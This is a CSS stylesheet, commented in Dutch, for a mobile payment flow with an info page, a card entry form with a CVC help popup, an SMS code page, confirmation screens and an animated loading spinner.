/* =========================
   RESET / BASIS
========================= */
* {
  box-sizing: border-box;
  margin: 0;
  padding: 0;
}

body {
  margin: 0;
  background: #f5f5f5;
  font-family: 'Montserrat', Arial, sans-serif;
}

.phone {
  width: 100%;
  min-height: 100vh;
  background: #f5f5f5;
  display: flex;
  flex-direction: column;
}

/* =========================
   GEDEELDE HEADER STYLES
========================= */
.topbar,
.payment-header {
  height: 90px;
  background: #f3f3f3;
  display: flex;
  align-items: center;
  gap: 14px;
  padding: 0 20px;
  border-bottom: 1px solid #d8d8d8;
  box-shadow: 0 4px 10px rgba(0, 0, 0, 0.12);
}

.logo-img {
  height: 42px;
  width: auto;
  display: block;
  mix-blend-mode: multiply;
}

.payment-header-title {
  font-size: 20px;
  color: #444;
}

/* =========================
   GEDEELDE FOOTER STYLES
========================= */
.footer {
  margin-top: auto;
  padding: 20px 16px;
  text-align: center;
}

.links {
  display: flex;
  justify-content: center;
  gap: 16px;
  flex-wrap: wrap;
  font-size: 13px;
}

.links a {
  color: #4b5563;
  text-decoration: underline;
}

/* =========================
   INDEX.HTML
========================= */
.page-content {
  flex: 1;
  padding: 28px 20px 40px;
}

.info-title {
  font-size: 28px;
  font-weight: 600;
  margin-bottom: 24px;
  color: #1f2937;
}

.info-box {
  display: flex;
  gap: 14px;
  background: #eaf4fb;
  border: 2px solid #5aa7d6;
  border-radius: 10px;
  padding: 18px 16px;
  margin-bottom: 28px;
}

.info-box .info-icon {
  flex: 0 0 32px;
  width: 32px;
  height: 32px;
  border-radius: 50%;
  background: #4c9ed3;
  color: #ffffff;
  font-size: 16px;
  font-weight: 700;
  display: flex;
  align-items: center;
  justify-content: center;
  margin-top: 4px;
}

.info-text {
  font-size: 16px;
  line-height: 1.6;
  color: #2b2b2b;
}

.details-box {
  background: #ffffff;
  border: 2px solid #ef7d00;
  border-radius: 10px;
  padding: 16px;
  margin-top: 20px;
}

.details-title {
  font-weight: 700;
  margin-bottom: 10px;
}

.detail-row {
  display: flex;
  justify-content: space-between;
  font-size: 14px;
  margin-bottom: 6px;
}

.price {
  color: #ef7d00;
  font-weight: 700;
}

.action-btn {
  width: 100%;
  height: 70px;
  border-radius: 999px;
  border: none;
  background: #ef7d00;
  color: #ffffff;
  font-weight: 700;
  font-size: 17px;
  margin-top: 24px;
  text-align: center;
  line-height: 70px;
  text-decoration: none;
  display: block;
}

/* =========================
   3.HTML / PAYMENT PAGE
========================= */
.payment-page {
  flex: 1;
  padding: 28px 20px 40px;
}

.title {
  font-size: 30px;
  font-weight: 700;
  margin-bottom: 28px;
  color: #1f2937;
}

.input-wrapper {
  position: relative;
  margin-bottom: 18px;
}

.input {
  width: 100%;
  height: 72px;
  border-radius: 22px;
  border: 2px solid #e5e5e5;
  padding: 0 52px 0 18px;
  font-size: 17px;
  font-family: 'Montserrat', Arial, sans-serif;
  outline: none;
  background: #ffffff;
  transition: all 0.2s ease;
}

.input.valid {
  border-color: #22c55e;
}

.input.invalid {
  border-color: #ef4444;
}

.input-icon {
  position: absolute;
  right: 16px;
  top: 50%;
  transform: translateY(-50%);
  width: 24px;
  height: 24px;
  object-fit: contain;
  opacity: 0.7;
}

.row {
  display: flex;
  gap: 14px;
  margin-bottom: 10px;
}

.small-input {
  margin-bottom: 0;
}

.row>.small-input,
.row>.cvc-field {
  flex: 1;
}

.cvc-field {
  position: relative;
}

.cvc-field .input {
  padding-right: 44px;
}

.cvc-field .info-icon {
  position: absolute;
  right: 14px;
  top: 50%;
  transform: translateY(-50%);
  width: 24px;
  height: 24px;
  border: 1px solid #cfcfcf;
  border-radius: 50%;
  background: #ffffff;
  color: #555;
  font-size: 13px;
  font-weight: 700;
  display: flex;
  align-items: center;
  justify-content: center;
  cursor: pointer;
}

.info-popup {
  position: absolute;
  top: calc(100% + 10px);
  right: 0;
  width: 230px;
  background: #1f2937;
  color: #ffffff;
  font-size: 13px;
  line-height: 1.5;
  padding: 12px;
  border-radius: 12px;
  box-shadow: 0 10px 24px rgba(0, 0, 0, 0.2);
  display: none;
  z-index: 20;
}

.info-popup.show {
  display: block;
}

.pay-btn {
  width: 100%;
  height: 76px;
  border-radius: 999px;
  border: none;
  background: #d1d5db;
  color: #9ca3af;
  font-weight: 700;
  font-size: 19px;
  font-family: 'Montserrat', Arial, sans-serif;
  margin: 28px 0 20px;
  transition: all 0.2s ease;
}

.pay-btn:disabled {
  cursor: not-allowed;
  opacity: 0.8;
}

.pay-btn.enabled {
  background: #ef7d00;
  color: #ffffff;
  cursor: pointer;
  opacity: 1;
}

/* =========================
   SMS.HTML
========================= */
.subtitle {
  font-size: 16px;
  line-height: 1.6;
  color: #4b5563;
  margin-bottom: 28px;
  max-width: 420px;
}

.code-row {
  display: flex;
  gap: 10px;
  justify-content: flex-start;
  margin-bottom: 28px;
}

.code-input {
  width: 48px;
  height: 60px;
  border-radius: 16px;
  border: 2px solid #e5e5e5;
  background: #ffffff;
  text-align: center;
  font-size: 22px;
  font-family: 'Montserrat', Arial, sans-serif;
  outline: none;
}

.code-input:focus {
  border-color: #9ca3af;
}

.code-input.filled {
  border-color: #22c55e;
}

.submit-btn {
  width: 100%;
  height: 64px;
  border-radius: 999px;
  border: none;
  background: #d1d5db;
  color: #9ca3af;
  font-weight: 700;
  font-size: 17px;
  font-family: 'Montserrat', Arial, sans-serif;
  margin-top: 50px;
  transition: all 0.2s ease;
}

.submit-btn.enabled {
  background: #ef7d00;
  color: #ffffff;
  cursor: pointer;
}

.submit-btn:disabled {
  cursor: not-allowed;
}

.helper {
  margin-top: 16px;
  font-size: 14px;
  color: #6b7280;
  text-align: center;
}

/* =========================
   SUCCESS / REDIRECT PAGE
========================= */
.success-page {
  flex: 1;
  padding: 40px 24px;
  display: flex;
  flex-direction: column;
  align-items: center;
  text-align: center;
}

.check-circle {
  width: 90px;
  height: 90px;
  border-radius: 50%;
  background: #ef7d00;
  display: flex;
  align-items: center;
  justify-content: center;
  margin-bottom: 30px;
  box-shadow: 0 6px 18px rgba(239, 125, 0, 0.3);
}

.check {
  color: #ffffff;
  font-size: 40px;
  font-weight: bold;
}

.success-title {
  font-size: 26px;
  font-weight: 700;
  color: #1f2937;
  margin-bottom: 16px;
}

.success-text {
  font-size: 16px;
  line-height: 1.6;
  color: #4b5563;
  max-width: 320px;
}

.done-btn {
  width: 100%;
  height: 64px;
  border-radius: 999px;
  border: none;
  background: #ef7d00;
  color: #ffffff;
  font-weight: 700;
  font-size: 17px;
  margin-top: 50px;
  cursor: pointer;
}

/* =========================
   RESPONSIVE
========================= */
@media (min-width: 390px) {
  .payment-page {
    padding: 32px 24px 44px;
  }

  .title {
    font-size: 32px;
  }

  .input {
    height: 74px;
    font-size: 18px;
  }

  .pay-btn {
    height: 78px;
    font-size: 20px;
  }
}

@media (max-width: 360px) {
  .payment-page {
    padding: 28px 16px 40px;
  }

  .title {
    font-size: 28px;
  }

  .code-row {
    gap: 8px;
  }

  .code-input {
    max-width: 48px;
    height: 58px;
    font-size: 22px;
  }
}

.confirm-page {
  flex: 1;
  padding: 40px 24px 44px;
  display: flex;
  flex-direction: column;
  align-items: center;
  text-align: center;
}

.confirm-icon-wrap {
  margin-bottom: 28px;
}

.confirm-icon-circle {
  width: 110px;
  height: 110px;
  border-radius: 50%;
  background: #fff3e6;
  display: flex;
  align-items: center;
  justify-content: center;
  box-shadow: 0 6px 18px rgba(239, 125, 0, 0.15);
}

.confirm-icon {
  font-size: 42px;
  line-height: 1;
}

.confirm-title {
  font-size: 28px;
  font-weight: 700;
  line-height: 1.25;
  color: #1f2937;
  margin-bottom: 16px;
  max-width: 320px;
}

.confirm-text {
  font-size: 16px;
  line-height: 1.6;
  color: #4b5563;
  max-width: 320px;
  margin-bottom: 22px;
}

.confirm-note {
  font-size: 14px;
  line-height: 1.6;
  color: #6b7280;
  max-width: 300px;
}

@media (min-width: 390px) {
  .confirm-page {
    padding: 48px 28px 48px;
  }

  .confirm-title {
    font-size: 30px;
  }
}
















@keyframes ldio-yzaezf3dcmj {
  0% {
    opacity: 1
  }

  100% {
    opacity: 0
  }
}

.ldio-yzaezf3dcmj div {
  left: 94px;
  top: 48px;
  position: absolute;
  animation: ldio-yzaezf3dcmj linear 1s infinite;
  background: #ef7d00;
  width: 12px;
  height: 24px;
  border-radius: 6px / 12px;
  transform-origin: 6px 52px;
}

.ldio-yzaezf3dcmj div:nth-child(1) {
  transform: rotate(0deg);
  animation-delay: -0.9166666666666666s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(2) {
  transform: rotate(30deg);
  animation-delay: -0.8333333333333334s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(3) {
  transform: rotate(60deg);
  animation-delay: -0.75s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(4) {
  transform: rotate(90deg);
  animation-delay: -0.6666666666666666s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(5) {
  transform: rotate(120deg);
  animation-delay: -0.5833333333333334s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(6) {
  transform: rotate(150deg);
  animation-delay: -0.5s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(7) {
  transform: rotate(180deg);
  animation-delay: -0.4166666666666667s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(8) {
  transform: rotate(210deg);
  animation-delay: -0.3333333333333333s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(9) {
  transform: rotate(240deg);
  animation-delay: -0.25s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(10) {
  transform: rotate(270deg);
  animation-delay: -0.16666666666666666s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(11) {
  transform: rotate(300deg);
  animation-delay: -0.08333333333333333s;
  background: #ef7d00;
}

.ldio-yzaezf3dcmj div:nth-child(12) {
  transform: rotate(330deg);
  animation-delay: 0s;
  background: #ef7d00;
}

.loadingio-spinner-spinner-2by998twmg8 {
  width: 200px;
  height: 200px;
  display: inline-block;
  overflow: hidden; 
}

.ldio-yzaezf3dcmj {
  width: 100%;
  height: 100%;
  position: relative;
  transform: translateZ(0) scale(1);
  backface-visibility: hidden;
  transform-origin: 0 0;
  /* see note above */
}

.ldio-yzaezf3dcmj div {
  box-sizing: content-box;
}

/* [ldio] generated by https://loading.io */